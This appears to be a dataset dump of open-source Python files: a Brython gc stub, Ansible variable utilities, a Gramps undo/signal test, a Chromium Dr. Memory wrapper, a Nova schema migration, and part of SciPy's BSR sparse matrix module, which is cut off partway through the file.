repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
40223143/cda-w15 | static/Brython3.1.1-20150328-091302/Lib/gc.py | 743 | 3548 | """This module provides access to the garbage collector for reference cycles.
enable() -- Enable automatic garbage collection.
disable() -- Disable automatic garbage collection.
isenabled() -- Returns true if automatic collection is enabled.
collect() -- Do a full collection right now.
get_count() -- Return the current collection counts.
set_debug() -- Set debugging flags.
get_debug() -- Get debugging flags.
set_threshold() -- Set the collection thresholds.
get_threshold() -- Return the current the collection thresholds.
get_objects() -- Return a list of all objects tracked by the collector.
is_tracked() -- Returns true if a given object is tracked.
get_referrers() -- Return the list of objects that refer to an object.
get_referents() -- Return the list of objects that an object refers to.
"""
DEBUG_COLLECTABLE = 2
DEBUG_LEAK = 38
DEBUG_SAVEALL = 32
DEBUG_STATS = 1
DEBUG_UNCOLLECTABLE = 4
class __loader__:
pass
callbacks = []
def collect(*args,**kw):
"""collect([generation]) -> n
With no arguments, run a full collection. The optional argument
may be an integer specifying which generation to collect. A ValueError
is raised if the generation number is invalid.
The number of unreachable objects is returned.
"""
pass
def disable(*args,**kw):
"""disable() -> None
Disable automatic garbage collection.
"""
pass
def enable(*args,**kw):
"""enable() -> None
Enable automatic garbage collection.
"""
pass
garbage = []
def get_count(*args,**kw):
"""get_count() -> (count0, count1, count2)
Return the current collection counts
"""
pass
def get_debug(*args,**kw):
"""get_debug() -> flags
Get the garbage collection debugging flags.
"""
pass
def get_objects(*args,**kw):
"""get_objects() -> [...]
Return a list of objects tracked by the collector (excluding the list
returned).
"""
pass
def get_referents(*args,**kw):
"""get_referents(*objs) -> list Return the list of objects that are directly referred to by objs."""
pass
def get_referrers(*args,**kw):
"""get_referrers(*objs) -> list Return the list of objects that directly refer to any of objs."""
pass
def get_threshold(*args,**kw):
"""get_threshold() -> (threshold0, threshold1, threshold2)
Return the current collection thresholds
"""
pass
def is_tracked(*args,**kw):
"""is_tracked(obj) -> bool
Returns true if the object is tracked by the garbage collector.
Simple atomic objects will return false.
"""
pass
def isenabled(*args,**kw):
"""isenabled() -> status
Returns true if automatic garbage collection is enabled.
"""
pass
def set_debug(*args,**kw):
"""set_debug(flags) -> None
Set the garbage collection debugging flags. Debugging information is
written to sys.stderr.
flags is an integer and can have the following bits turned on:
DEBUG_STATS - Print statistics during collection.
DEBUG_COLLECTABLE - Print collectable objects found.
DEBUG_UNCOLLECTABLE - Print unreachable but uncollectable objects found.
DEBUG_SAVEALL - Save objects to gc.garbage rather than freeing them.
DEBUG_LEAK - Debug leaking programs (everything but STATS).
"""
pass
def set_threshold(*args,**kw):
"""set_threshold(threshold0, [threshold1, threshold2]) -> None
Sets the collection thresholds. Setting threshold0 to zero disables
collection.
"""
pass
| agpl-3.0 |
chrrrles/ansible | lib/ansible/utils/vars.py | 25 | 4411 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import ast
from collections import MutableMapping
from six import iteritems, string_types
from ansible import constants as C
from ansible.errors import AnsibleError
from ansible.parsing.splitter import parse_kv
from ansible.utils.unicode import to_unicode
def _validate_mutable_mappings(a, b):
"""
Internal convenience function to ensure arguments are MutableMappings
This checks that all arguments are MutableMappings or raises an error
:raises AnsibleError: if one of the arguments is not a MutableMapping
"""
# If this becomes generally needed, change the signature to operate on
# a variable number of arguments instead.
if not (isinstance(a, MutableMapping) and isinstance(b, MutableMapping)):
raise AnsibleError("failed to combine variables, expected dicts but"
" got a '{0}' and a '{1}'".format(
a.__class__.__name__, b.__class__.__name__))
def combine_vars(a, b):
"""
Return a copy of dictionaries of variables based on configured hash behavior
"""
if C.DEFAULT_HASH_BEHAVIOUR == "merge":
return merge_hash(a, b)
else:
# HASH_BEHAVIOUR == 'replace'
_validate_mutable_mappings(a, b)
result = a.copy()
result.update(b)
return result
def merge_hash(a, b):
"""
Recursively merges hash b into a so that keys from b take precedence over keys from a
"""
_validate_mutable_mappings(a, b)
result = a.copy()
# next, iterate over b keys and values
for k, v in iteritems(b):
# if there's already such key in a
# and that key contains a MutableMapping
if k in result and isinstance(result[k], MutableMapping):
# merge those dicts recursively
result[k] = merge_hash(result[k], v)
else:
# otherwise, just copy the value from b to a
result[k] = v
return result
def load_extra_vars(loader, options):
extra_vars = {}
for extra_vars_opt in options.extra_vars:
extra_vars_opt = to_unicode(extra_vars_opt, errors='strict')
if extra_vars_opt.startswith(u"@"):
# Argument is a YAML file (JSON is a subset of YAML)
data = loader.load_from_file(extra_vars_opt[1:])
elif extra_vars_opt and extra_vars_opt[0] in u'[{':
# Arguments as YAML
data = loader.load(extra_vars_opt)
else:
# Arguments as Key-value
data = parse_kv(extra_vars_opt)
extra_vars = combine_vars(extra_vars, data)
return extra_vars
def isidentifier(ident):
"""
Determines, if string is valid Python identifier using the ast module.
Orignally posted at: http://stackoverflow.com/a/29586366
"""
if not isinstance(ident, string_types):
return False
try:
root = ast.parse(ident)
except SyntaxError:
return False
if not isinstance(root, ast.Module):
return False
if len(root.body) != 1:
return False
if not isinstance(root.body[0], ast.Expr):
return False
if not isinstance(root.body[0].value, ast.Name):
return False
if root.body[0].value.id != ident:
return False
return True
def json_variable_cleaner(obj):
'''
Used as the default= parameter to json.dumps(), this method helps
clear out UnsafeProxy variables so they can be properly JSON encoded
'''
from ansible.vars.unsafe_proxy import UnsafeProxy
if isinstance(obj, UnsafeProxy):
return obj._obj
else:
return obj
| gpl-3.0 |
sam-m888/gramps | gramps/plugins/test/db_undo_and_signals_test.py | 1 | 17360 | #! /usr/bin/env python3
"""
Gramps - a GTK+/GNOME based genealogy program
Copyright (c) 2016 Gramps Development Team
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import unittest
#-------------------------------------------------------------------------
#
# Gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.utils.id import set_det_id
from gramps.gen.db import DbTxn
from gramps.gen.db.utils import make_database
from gramps.gen.dbstate import DbState
from gramps.cli.clidbman import CLIDbManager
from gramps.gen.lib import (Person, Family, Note, Surname)
from gramps.gen.merge import MergeFamilyQuery
from gramps.gen.utils.callman import CallbackManager
class DbTestClassBase(object):
# Inherit from `object` so unittest doesn't think these are tests which
# should be run
@classmethod
def setUpClass(cls):
# print("doing setup with", cls.param)
set_det_id(True) # handles must be deterministic for this test
cls.dbstate = DbState()
cls.dbman = CLIDbManager(cls.dbstate)
dirpath, _name = cls.dbman.create_new_db_cli("Test: %s" % cls.param,
dbid=cls.param)
cls.db = make_database(cls.param)
cls.db.load(dirpath, None)
@classmethod
def tearDownClass(cls):
# print("tear down", cls.param)
cls.db.close()
cls.dbman.remove_database("Test: %s" % cls.param)
def __add_person(self, gender, first_name, surname, trans):
person = Person()
person.gender = gender
_name = person.primary_name
_name.first_name = first_name
surname1 = Surname()
surname1.surname = surname
_name.set_surname_list([surname1])
self.db.add_person(person, trans)
return person
def __add_note(self, text, trans):
note = Note(text=text)
self.db.add_note(note, trans)
return note
def __add_family(self, father, mother, trans):
family = Family()
family.set_father_handle(father.handle)
family.set_mother_handle(mother.handle)
fam_handle = self.db.add_family(family, trans)
father.add_family_handle(fam_handle)
mother.add_family_handle(fam_handle)
self.db.commit_person(father, trans)
self.db.commit_person(mother, trans)
return family
def __setup_callbacks(self):
self.db.connect("family-add", self._family_add)
self.db.connect("family-update", self._family_update)
self.db.connect("family-delete", self._family_delete)
self.db.connect("person-add", self._person_add)
self.db.connect("person-update", self._person_update)
self.db.connect("person-delete", self._person_delete)
self.db.connect("note-add", self._note_add)
self.db.connect("note-update", self._note_update)
self.db.connect("note-delete", self._note_delete)
# we will also test the CallbackManager by watching a single person
self.cm_sigs = []
self.callman = CallbackManager(self.db)
self.callman.register_callbacks({'person-delete': self._cm_pers_delete,
'person-update': self._cm_pers_update,
'person-add': self._cm_pers_add})
self.callman.connect_all(keys=['person'])
self.callman.register_handles({'person': ['0000000300000003',
'0000000700000007']})
def _family_add(self, *args):
self._log_sig("family-add", args)
def _family_update(self, *args):
self._log_sig("family-update", args)
def _family_delete(self, *args):
self._log_sig("family-delete", args)
def _person_add(self, *args):
self._log_sig("person-add", args)
def _person_update(self, *args):
self._log_sig("person-update", args)
def _person_delete(self, *args):
self._log_sig("person-delete", args)
def _note_add(self, *args):
self._log_sig("note-add", args)
def _note_update(self, *args):
self._log_sig("note-update", args)
def _note_delete(self, *args):
self._log_sig("note-delete", args)
def _log_sig(self, sig, args):
print("('%s', %s)," % (sig, args))
self.sigs.append((sig, args[0]))
def _cm_pers_add(self, *args):
self.cm_sigs.append(("person-add", args[0]))
def _cm_pers_update(self, *args):
self.cm_sigs.append(("person-update", args[0]))
def _cm_pers_delete(self, *args):
self.cm_sigs.append(("person-delete", args[0]))
def test_one(self):
self.__setup_callbacks()
self.sigs = []
with DbTxn('Add test objects', self.db) as trans:
father1 = self.__add_person(Person.MALE, 'John', 'Allen', trans)
mother1 = self.__add_person(Person.FEMALE, 'Mary', 'Allen', trans)
father2 = self.__add_person(Person.MALE, 'John', 'Baker', trans)
mother2 = self.__add_person(Person.FEMALE, 'Mary', 'Baker', trans)
family1 = self.__add_family(father1, mother1, trans)
family2 = self.__add_family(father2, mother2, trans)
self.callman.register_obj(father2, directonly=True)
self.callman.register_obj(father2, directonly=False)
sigs = [
('person-add', ['0000000100000001', '0000000200000002',
'0000000300000003', '0000000400000004']),
('family-add', ['0000000500000005', '0000000600000006']),
('person-update', ['0000000100000001', '0000000200000002',
'0000000300000003', '0000000400000004'])]
self.assertEqual(sigs, self.sigs, msg="make families")
# save state for later undo/redo check
step1 = (family1, father1, mother1, family2, father2, mother2)
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 2, msg="make families check")
self.assertEqual(pers_cnt, 4, msg="make families persons check")
# lets do a family merge, this will not only combine the families, but
# also combine the the fathers and mothers as well
self.sigs = []
query = MergeFamilyQuery(self.db, family1, family2,
father1.handle, mother1.handle)
query.execute()
sigs = [
('person-delete', ['0000000300000003', '0000000400000004']),
('family-delete', ['0000000600000006']),
('person-update', ['0000000100000001', '0000000200000002',
'0000000100000001', '0000000200000002']),
('family-update', ['0000000500000005', '0000000500000005'])]
self.assertEqual(sigs, self.sigs, msg="merge families")
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 1, msg="merge families check")
self.assertEqual(pers_cnt, 2, msg="merge families persons check")
# save new family'people for later redo check
family1 = self.db.get_family_from_handle(family1.handle)
father1 = self.db.get_person_from_handle(father1.handle)
mother1 = self.db.get_person_from_handle(mother1.handle)
step2 = (family1, father1, mother1)
# we check that update and add signals are not emitted if the same
# object is deleted in the same transation
self.sigs = []
with DbTxn('Note add/update/delete', self.db) as trans:
note = self.__add_note("some text", trans)
note.set("some other text")
self.db.commit_note(note, trans)
self.db.remove_note(note.handle, trans)
sigs = [
('note-delete', ['0000000700000007'])]
self.assertEqual(sigs, self.sigs, msg="note signals check")
note_cnt = self.db.get_number_of_notes()
self.assertEqual(note_cnt, 0, msg="note check")
# Test some undos, start with the note undo
self.sigs = []
self.db.undo()
sigs = [('note-delete', ['0000000700000007'])]
self.assertEqual(sigs, self.sigs, msg="undo note signals check")
# Test merge undo
self.sigs = []
self.db.undo()
sigs = [
('person-add', ['0000000400000004', '0000000300000003']),
('family-add', ['0000000600000006']),
('person-update', ['0000000200000002', '0000000100000001',
'0000000200000002', '0000000100000001']),
('family-update', ['0000000500000005', '0000000600000006',
'0000000600000006', '0000000500000005'])]
self.assertEqual(sigs, self.sigs, msg="undo merge signals check")
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 2, msg="undo merge families check")
self.assertEqual(pers_cnt, 4, msg="undo merge families persons check")
#step1 = (family1, father1, mother1, family2, father2, mother2)
obj_s = self.db.get_family_from_handle(family1.handle).serialize()
self.assertEqual(obj_s, step1[0].serialize(),
msg="undo merge families fam1 check")
obj_s = self.db.get_person_from_handle(father1.handle).serialize()
self.assertEqual(obj_s, step1[1].serialize(),
msg="undo merge families father1 check")
obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
self.assertEqual(obj_s, step1[2].serialize(),
msg="undo merge families mother1 check")
obj_s = self.db.get_family_from_handle(family2.handle).serialize()
self.assertEqual(obj_s, step1[3].serialize(),
msg="undo merge families fam2 check")
obj_s = self.db.get_person_from_handle(father2.handle).serialize()
self.assertEqual(obj_s, step1[4].serialize(),
msg="undo merge families father2 check")
obj_s = self.db.get_person_from_handle(mother2.handle).serialize()
self.assertEqual(obj_s, step1[5].serialize(),
msg="undo merge families mother2 check")
# Test family build undo
self.sigs = []
self.db.undo()
sigs = [
('person-delete', ['0000000400000004', '0000000300000003',
'0000000200000002', '0000000100000001']),
('family-delete', ['0000000600000006', '0000000500000005'])]
self.assertEqual(sigs, self.sigs, msg="undo family build signals check")
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 0, msg="undo make families check")
self.assertEqual(pers_cnt, 0, msg="undo make families persons check")
# Test family build redo
self.sigs = []
self.db.redo()
sigs = [
('person-add', ['0000000100000001', '0000000200000002',
'0000000300000003', '0000000400000004']),
('family-add', ['0000000500000005', '0000000600000006']),
('person-update', ['0000000100000001', '0000000200000002',
'0000000300000003', '0000000400000004'])]
self.assertEqual(sigs, self.sigs, msg="redo family build signals check")
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 2, msg="redo make families check")
self.assertEqual(pers_cnt, 4, msg="redo make families persons check")
#step1 = (family1, father1, mother1, family2, father2, mother2)
obj_s = self.db.get_family_from_handle(family1.handle).serialize()
self.assertEqual(obj_s, step1[0].serialize(),
msg="redo merge families fam1 check")
obj_s = self.db.get_person_from_handle(father1.handle).serialize()
self.assertEqual(obj_s, step1[1].serialize(),
msg="redo merge families father1 check")
obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
self.assertEqual(obj_s, step1[2].serialize(),
msg="redo merge families mother1 check")
obj_s = self.db.get_family_from_handle(family2.handle).serialize()
self.assertEqual(obj_s, step1[3].serialize(),
msg="redo merge families fam2 check")
obj_s = self.db.get_person_from_handle(father2.handle).serialize()
self.assertEqual(obj_s, step1[4].serialize(),
msg="redo merge families father2 check")
obj_s = self.db.get_person_from_handle(mother2.handle).serialize()
self.assertEqual(obj_s, step1[5].serialize(),
msg="redo merge families mother2 check")
# Test family merge redo
self.sigs = []
self.db.redo()
sigs = [
('person-delete', ['0000000300000003', '0000000400000004']),
('family-delete', ['0000000600000006']),
('person-update', ['0000000100000001', '0000000200000002',
'0000000100000001', '0000000200000002']),
('family-update', ['0000000500000005', '0000000500000005'])]
self.assertEqual(sigs, self.sigs, msg="merge families")
fam_cnt = self.db.get_number_of_families()
pers_cnt = self.db.get_number_of_people()
self.assertEqual(fam_cnt, 1, msg="merge families check")
self.assertEqual(pers_cnt, 2, msg="merge families persons check")
#step2 = (family1, father1, mother1)
obj_s = self.db.get_family_from_handle(family1.handle).serialize()
self.assertEqual(obj_s, step2[0].serialize(),
msg="undo merge families fam1 check")
obj_s = self.db.get_person_from_handle(father1.handle).serialize()
self.assertEqual(obj_s, step2[1].serialize(),
msg="undo merge families father1 check")
obj_s = self.db.get_person_from_handle(mother1.handle).serialize()
self.assertEqual(obj_s, step2[2].serialize(),
msg="undo merge families mother1 check")
# Test note redo
self.sigs = []
self.db.redo()
sigs = [('note-delete', ['0000000700000007'])]
self.assertEqual(sigs, self.sigs, msg="undo note signals check")
# now lets see if the callback manager is doing its job
# print(self.cm_sigs)
sigs = [
('person-add', ['0000000300000003']),
('person-update', ['0000000300000003']),
('person-delete', ['0000000300000003']),
('person-add', ['0000000300000003']),
('person-delete', ['0000000300000003']),
('person-add', ['0000000300000003']),
('person-update', ['0000000300000003']),
('person-delete', ['0000000300000003'])]
self.assertEqual(sigs, self.cm_sigs,
msg="callback manager signals check")
self.callman.unregister_handles({'person': ['0000000300000003']})
# we have to look deep into cm to see if handles are really deleted
cm_persons = self.callman._CallbackManager__handles['person']
self.assertEqual(cm_persons, ['0000000700000007'],
msg="Callback Manager unregister check")
self.callman.unregister_all()
# we have to look deep into cm to see if handles are really deleted
cm_persons = self.callman._CallbackManager__handles['person']
self.assertEqual(cm_persons, [],
msg="Callback Manager unregister check")
# we have to look deep into cm to see if callbacks are really deleted
cm_padd_key = self.callman._CallbackManager__callbacks['person-add'][1]
self.assertEqual(cm_padd_key, 10,
msg="Callback Manager cb check")
self.callman.disconnect_all()
# we have to look deep into cm to see if callbacks are really deleted
cm_padd_key = self.callman._CallbackManager__callbacks['person-add'][1]
self.assertEqual(cm_padd_key, None,
msg="Callback Manager disconnect cb check")
params = [('BsdDb', 'bsddb'), ('SQLite', 'sqlite')]
for name, param in params:
cls_name = "TestMyTestClass_%s" % (name, )
globals()[cls_name] = type(cls_name, (DbTestClassBase, unittest.TestCase),
{"param": param, })
if __name__ == "__main__":
unittest.main()
| gpl-2.0 |
bright-sparks/chromium-spacewalk | tools/valgrind/browser_wrapper_win.py | 44 | 1638 | # Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import re
import sys
import subprocess
# TODO(timurrrr): we may use it on POSIX too to avoid code duplication once we
# support layout_tests, remove Dr. Memory specific code and verify it works
# on a "clean" Mac.
testcase_name = None
for arg in sys.argv:
m = re.match("\-\-gtest_filter=(.*)", arg)
if m:
assert testcase_name is None
testcase_name = m.groups()[0]
# arg #0 is the path to this python script
cmd_to_run = sys.argv[1:]
# TODO(timurrrr): this is Dr. Memory-specific
# Usually, we pass "-logdir" "foo\bar\spam path" args to Dr. Memory.
# To group reports per UI test, we want to put the reports for each test into a
# separate directory. This code can be simplified when we have
# http://code.google.com/p/drmemory/issues/detail?id=684 fixed.
logdir_idx = cmd_to_run.index("-logdir")
old_logdir = cmd_to_run[logdir_idx + 1]
wrapper_pid = str(os.getpid())
# On Windows, there is a chance of PID collision. We avoid it by appending the
# number of entries in the logdir at the end of wrapper_pid.
# This number is monotonic and we can't have two simultaneously running wrappers
# with the same PID.
wrapper_pid += "_%d" % len(glob.glob(old_logdir + "\\*"))
cmd_to_run[logdir_idx + 1] += "\\testcase.%s.logs" % wrapper_pid
os.makedirs(cmd_to_run[logdir_idx + 1])
if testcase_name:
f = open(old_logdir + "\\testcase.%s.name" % wrapper_pid, "w")
print >>f, testcase_name
f.close()
exit(subprocess.call(cmd_to_run))
| bsd-3-clause |
dstroppa/openstack-smartos-nova-grizzly | nova/db/sqlalchemy/migrate_repo/versions/147_no_service_zones.py | 7 | 3579 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import String, Column, MetaData, Table, select
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
""" Remove availability_zone column from services model and replace with
aggregate based zone."""
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregates = Table('aggregates', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
# migrate data
record_list = list(services.select().execute())
for rec in record_list:
# Only need to migrate nova-compute availability_zones
if rec['binary'] != 'nova-compute':
continue
# if zone doesn't exist create
result = aggregate_metadata.select().where(
aggregate_metadata.c.key == 'availability_zone').where(
aggregate_metadata.c.value == rec['availability_zone']).execute()
result = [r for r in result]
if len(result) > 0:
agg_id = result[0].aggregate_id
else:
agg = aggregates.insert()
result = agg.execute({'name': rec['availability_zone']})
agg_id = result.inserted_primary_key[0]
row = aggregate_metadata.insert()
row.execute({'created_at': rec['created_at'],
'updated_at': rec['updated_at'],
'deleted_at': rec['deleted_at'],
'deleted': rec['deleted'],
'key': 'availability_zone',
'value': rec['availability_zone'],
'aggregate_id': agg_id,
})
# add host to zone
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
num_hosts = agg_hosts.count().where(
agg_hosts.c.host == rec['host']).where(
agg_hosts.c.aggregate_id == agg_id).execute().scalar()
if num_hosts == 0:
agg_hosts.insert().execute({'host': rec['host'],
'aggregate_id': agg_id})
services.drop_column('availability_zone')
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
services = Table('services', meta, autoload=True)
aggregate_metadata = Table('aggregate_metadata', meta, autoload=True)
agg_hosts = Table('aggregate_hosts', meta, autoload=True)
availability_zone = Column('availability_zone', String(255),
default='nova')
services.create_column(availability_zone)
# migrate data
services.update().values(availability_zone=select(
[aggregate_metadata.c.value]).
where(agg_hosts.c.aggregate_id == aggregate_metadata.c.aggregate_id).
where(aggregate_metadata.c.key == 'availability_zone').
where(agg_hosts.c.host == services.c.host).
where(services.c.binary == 'nova-compute')).execute()
| apache-2.0 |
mdhaber/scipy | scipy/sparse/bsr.py | 12 | 25610 | """Compressed Block Sparse Row matrix format"""
__docformat__ = "restructuredtext en"
__all__ = ['bsr_matrix', 'isspmatrix_bsr']
from warnings import warn
import numpy as np
from .data import _data_matrix, _minmax_mixin
from .compressed import _cs_matrix
from .base import isspmatrix, _formats, spmatrix
from .sputils import (isshape, getdtype, getdata, to_native, upcast,
get_index_dtype, check_shape)
from . import _sparsetools
from ._sparsetools import (bsr_matvec, bsr_matvecs, csr_matmat_maxnnz,
bsr_matmat, bsr_transpose, bsr_sort_indices,
bsr_tocsr)
class bsr_matrix(_cs_matrix, _minmax_mixin):
"""Block Sparse Row matrix
This can be instantiated in several ways:
bsr_matrix(D, [blocksize=(R,C)])
where D is a dense matrix or 2-D ndarray.
bsr_matrix(S, [blocksize=(R,C)])
with another sparse matrix S (equivalent to S.tobsr())
bsr_matrix((M, N), [blocksize=(R,C), dtype])
to construct an empty matrix with shape (M, N)
dtype is optional, defaulting to dtype='d'.
bsr_matrix((data, ij), [blocksize=(R,C), shape=(M, N)])
where ``data`` and ``ij`` satisfy ``a[ij[0, k], ij[1, k]] = data[k]``
bsr_matrix((data, indices, indptr), [shape=(M, N)])
is the standard BSR representation where the block column
indices for row i are stored in ``indices[indptr[i]:indptr[i+1]]``
and their corresponding block values are stored in
``data[ indptr[i]: indptr[i+1] ]``. If the shape parameter is not
supplied, the matrix dimensions are inferred from the index arrays.
Attributes
----------
dtype : dtype
Data type of the matrix
shape : 2-tuple
Shape of the matrix
ndim : int
Number of dimensions (this is always 2)
nnz
Number of stored values, including explicit zeros
data
Data array of the matrix
indices
BSR format index array
indptr
BSR format index pointer array
blocksize
Block size of the matrix
has_sorted_indices
Whether indices are sorted
Notes
-----
Sparse matrices can be used in arithmetic operations: they support
addition, subtraction, multiplication, division, and matrix power.
**Summary of BSR format**
The Block Compressed Row (BSR) format is very similar to the Compressed
Sparse Row (CSR) format. BSR is appropriate for sparse matrices with dense
sub matrices like the last example below. Block matrices often arise in
vector-valued finite element discretizations. In such cases, BSR is
considerably more efficient than CSR and CSC for many sparse arithmetic
operations.
**Blocksize**
The blocksize (R,C) must evenly divide the shape of the matrix (M,N).
That is, R and C must satisfy the relationship ``M % R = 0`` and
``N % C = 0``.
If no blocksize is specified, a simple heuristic is applied to determine
an appropriate blocksize.
Examples
--------
>>> from scipy.sparse import bsr_matrix
>>> bsr_matrix((3, 4), dtype=np.int8).toarray()
array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]], dtype=int8)
>>> row = np.array([0, 0, 1, 2, 2, 2])
>>> col = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3 ,4, 5, 6])
>>> bsr_matrix((data, (row, col)), shape=(3, 3)).toarray()
array([[1, 0, 2],
[0, 0, 3],
[4, 5, 6]])
>>> indptr = np.array([0, 2, 3, 6])
>>> indices = np.array([0, 2, 2, 0, 1, 2])
>>> data = np.array([1, 2, 3, 4, 5, 6]).repeat(4).reshape(6, 2, 2)
>>> bsr_matrix((data,indices,indptr), shape=(6, 6)).toarray()
array([[1, 1, 0, 0, 2, 2],
[1, 1, 0, 0, 2, 2],
[0, 0, 0, 0, 3, 3],
[0, 0, 0, 0, 3, 3],
[4, 4, 5, 5, 6, 6],
[4, 4, 5, 5, 6, 6]])
"""
format = 'bsr'
def __init__(self, arg1, shape=None, dtype=None, copy=False, blocksize=None):
_data_matrix.__init__(self)
if isspmatrix(arg1):
if isspmatrix_bsr(arg1) and copy:
arg1 = arg1.copy()
else:
arg1 = arg1.tobsr(blocksize=blocksize)
self._set_self(arg1)
elif isinstance(arg1,tuple):
if isshape(arg1):
# it's a tuple of matrix dimensions (M,N)
self._shape = check_shape(arg1)
M,N = self.shape
# process blocksize
if blocksize is None:
blocksize = (1,1)
else:
if not isshape(blocksize):
raise ValueError('invalid blocksize=%s' % blocksize)
blocksize = tuple(blocksize)
self.data = np.zeros((0,) + blocksize, getdtype(dtype, default=float))
R,C = blocksize
if (M % R) != 0 or (N % C) != 0:
raise ValueError('shape must be multiple of blocksize')
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
idx_dtype = get_index_dtype(maxval=max(M//R, N//C, R, C))
self.indices = np.zeros(0, dtype=idx_dtype)
self.indptr = np.zeros(M//R + 1, dtype=idx_dtype)
elif len(arg1) == 2:
# (data,(row,col)) format
from .coo import coo_matrix
self._set_self(
coo_matrix(arg1, dtype=dtype, shape=shape).tobsr(
blocksize=blocksize
)
)
elif len(arg1) == 3:
# (data,indices,indptr) format
(data, indices, indptr) = arg1
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
maxval = 1
if shape is not None:
maxval = max(shape)
if blocksize is not None:
maxval = max(maxval, max(blocksize))
idx_dtype = get_index_dtype((indices, indptr), maxval=maxval,
check_contents=True)
self.indices = np.array(indices, copy=copy, dtype=idx_dtype)
self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
self.data = getdata(data, copy=copy, dtype=dtype)
if self.data.ndim != 3:
raise ValueError(
'BSR data must be 3-dimensional, got shape=%s' % (
self.data.shape,))
if blocksize is not None:
if not isshape(blocksize):
raise ValueError('invalid blocksize=%s' % (blocksize,))
if tuple(blocksize) != self.data.shape[1:]:
raise ValueError('mismatching blocksize=%s vs %s' % (
blocksize, self.data.shape[1:]))
else:
raise ValueError('unrecognized bsr_matrix constructor usage')
else:
# must be dense
try:
arg1 = np.asarray(arg1)
except Exception as e:
raise ValueError("unrecognized form for"
" %s_matrix constructor" % self.format) from e
from .coo import coo_matrix
arg1 = coo_matrix(arg1, dtype=dtype).tobsr(blocksize=blocksize)
self._set_self(arg1)
if shape is not None:
self._shape = check_shape(shape)
else:
if self.shape is None:
# shape not already set, try to infer dimensions
try:
M = len(self.indptr) - 1
N = self.indices.max() + 1
except Exception as e:
raise ValueError('unable to infer matrix dimensions') from e
else:
R,C = self.blocksize
self._shape = check_shape((M*R,N*C))
if self.shape is None:
if shape is None:
# TODO infer shape here
raise ValueError('need to infer shape')
else:
self._shape = check_shape(shape)
if dtype is not None:
self.data = self.data.astype(dtype, copy=False)
self.check_format(full_check=False)
def check_format(self, full_check=True):
"""check whether the matrix format is valid
*Parameters*:
full_check:
True - rigorous check, O(N) operations : default
False - basic check, O(1) operations
"""
M,N = self.shape
R,C = self.blocksize
# index arrays should have integer data types
if self.indptr.dtype.kind != 'i':
warn("indptr array has non-integer dtype (%s)"
% self.indptr.dtype.name)
if self.indices.dtype.kind != 'i':
warn("indices array has non-integer dtype (%s)"
% self.indices.dtype.name)
idx_dtype = get_index_dtype((self.indices, self.indptr))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
self.data = to_native(self.data)
# check array shapes
if self.indices.ndim != 1 or self.indptr.ndim != 1:
raise ValueError("indices, and indptr should be 1-D")
if self.data.ndim != 3:
raise ValueError("data should be 3-D")
# check index pointer
if (len(self.indptr) != M//R + 1):
raise ValueError("index pointer size (%d) should be (%d)" %
(len(self.indptr), M//R + 1))
if (self.indptr[0] != 0):
raise ValueError("index pointer should start with 0")
# check index and data arrays
if (len(self.indices) != len(self.data)):
raise ValueError("indices and data should have the same size")
if (self.indptr[-1] > len(self.indices)):
raise ValueError("Last value of index pointer should be less than "
"the size of index and data arrays")
self.prune()
if full_check:
# check format validity (more expensive)
if self.nnz > 0:
if self.indices.max() >= N//C:
